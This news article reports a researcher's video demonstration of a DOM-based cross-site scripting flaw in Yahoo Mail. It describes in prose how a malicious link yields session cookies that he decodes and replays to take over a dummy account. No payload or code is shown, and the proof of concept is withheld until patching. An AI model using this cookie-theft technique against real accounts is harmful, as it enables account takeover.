A cross-site scripting (XSS) proof-of-concept exploit potentially puts 400 million Yahoo Mail users at risk of having their accounts taken over, one security researcher said.
In a video posted on YouTube, Shahin Ramezany showed an exploit for what he said is a document object model-based cross-site scripting vulnerability that affects Yahoo Mail users on all current browsers.
Using a maliciously crafted link, a pen-testing platform, Chrome browser add-on, and a touch of social engineering, Ramezany takes complete control of a dummy Yahoo Mail account in less than five minutes.
In the video, Ramezany sends an email with a malicious link embedded in it from one Yahoo Mail account he has open in Chrome to another account that he has setup in a separate Internet Explorer 10 browser. Before switching to his IE browser, Ramezany copies and pastes the malicious url into his Chrome address bar and gets a ‘404 Not Found’ message. He then switches over to IE, opens the email, and clicks the link, which, in turn, opens a new IE Window. Ramezany quickly minimizes the new window, so it is impossible to say for certain what happens there.
He then goes back to Chrome and enters the malicious link into the address bar there again. This time, instead of seeing a 404-page, Ramezany gets several lines of URL cookie text, which he copies and decodes in a penetration-testing platform called Burp Suite.
Finally, he takes part of the decoded script and plugs it into the “edit this cookie” Chrome browser add-on, refreshes the page, and, just like that, ends up logged into Chrome to the Yahoo account to which he sent the malicious email in the first place.
Ramezany plans to post the proof-of-concept on his site, Abysssec.com after Yahoo patches the vulnerability.